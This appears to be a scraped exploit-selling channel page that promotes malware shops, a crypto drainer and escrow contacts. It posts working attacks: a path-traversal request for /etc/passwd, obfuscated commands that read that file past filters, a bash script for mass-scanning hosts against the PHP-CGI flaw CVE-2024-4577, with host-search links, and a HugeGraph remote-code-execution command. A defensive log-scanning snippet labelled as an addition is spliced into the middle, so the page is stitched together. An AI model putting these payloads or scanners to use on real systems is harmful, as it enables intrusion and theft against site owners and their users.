Exploit Service
Exploit Service | BlackHat ZERO DAY'S EXPLOITS Everything is published for informational purposes only. Private: @ExploitServiceBot Exploit Developers: @ExploitDevs All Projects: @MalwareLinks Escrow: @MalwareEscrow
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd
FOFA:
title=="..:: HSC MailInspector ::.."
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupport
cat ${HOME:0:1}etc${HOME:0:1}passwd
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
The only one contact to start work: @stop
#!/bin/bash
# Function to check vulnerability for a domain
check_vulnerability() {
    local domain=$1
    local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
        -H "User-Agent: curl/8.3.0" \
        -H "Accept: */*" \
        -H "Content-Length: 23" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Connection: keep-alive" \
        --data "<?php phpinfo(); ?>" \
        --max-time 10)
    if [[ $response == *"PHP Version"* ]]; then
        echo "$domain: Vulnerable"
    fi
}
# Main function to iterate over domains
main() {
    local file=$1
    while IFS= read -r domain || [ -n "$domain" ]; do
        check_vulnerability "$domain"
    done < "$file"
}
# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <domain_list_file>"
    exit 1
fi
# Call the main function with the domain list file
main "$1"
Save the script and run it against a list of domains:
./CVE-2024-4577_script.sh /path/to/domains-list
When PHP-CGI runs on the Windows platform and uses certain code pages (Simplified Chinese 936, Traditional Chinese 950, Japanese 932, etc.), an attacker can craft malicious requests to bypass the fix for CVE-2012-1823. This allows them to execute arbitrary PHP code without authentication.
https://en.fofa.info/result?qbase64=YXBwPSJYQU1QUCI%3D (610,604 hosts)
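A defender-side check for the request shape described above, as an added example that is not part of the original channel post: it scans web access-log lines for query strings that php-cgi would receive as command-line arguments beginning with a soft hyphen (%AD) or a plain hyphen. The log lines, addresses and function names are constructed for illustration, and a combined-format access log is assumed.

```python
import re
from urllib.parse import unquote_to_bytes

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

SOFT_HYPHEN = 0xAD  # byte that best-fit conversion maps to '-' on the affected code pages
HYPHEN = 0x2D       # plain hyphen, the CVE-2012-1823 form

# Constructed sample log lines (documentation addresses); line 1 reuses the
# request shape from the script on this page.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2024:10:01:02 +0000] "POST /test.php?%ADd+allow_url_include'
    '%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 81234 "-" "curl/8.3.0"',
    '192.0.2.10 - - [10/Jun/2024:10:01:05 +0000] "GET /index.php?page=2&q=caf%C3%A9 '
    'HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Jun/2024:10:01:09 +0000] "GET /search.php?soft%ADhyphen+word '
    'HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
]

def suspicious_args(target):
    """Return query tokens that php-cgi would receive as command-line options."""
    _, sep, query = target.partition("?")
    # A query containing a literal '=' is handled as form data, not as arguments.
    if not sep or "=" in query:
        return []
    hits = []
    for token in query.split("+"):          # '+' separates the arguments
        raw = unquote_to_bytes(token)       # keep bytes: a lone 0xAD is not valid UTF-8
        if len(raw) >= 2 and raw[0] in (SOFT_HYPHEN, HYPHEN):
            hits.append(token)
    return hits

def scan(lines):
    """Return (line number, method, flagged tokens) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        hits = suspicious_args(match.group("target"))
        if hits:
            findings.append((number, match.group("method"), hits))
    return findings

if __name__ == "__main__":
    for number, method, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {method} request passes option-like arguments {hits}")
```

The third sample line shows why the check looks only at the first byte of each argument: a soft hyphen in the middle of a search term is not flagged.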
python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"
https://github.com/kljunowsky/CVE-2024-27348
Apache HugeGraph Server Unauthenticated RCE - CVE-2024-27348 Proof of concept Exploit - GitHub - kljunowsky/CVE-2024-27348: Apache HugeGraph Server Unauthenticated RCE - CVE-2024-27348 Proof of c...
Another fun exploit! This time with local privilege escalation through Apple’s PackageKit.framework when running ZSH-based PKGs 🎉.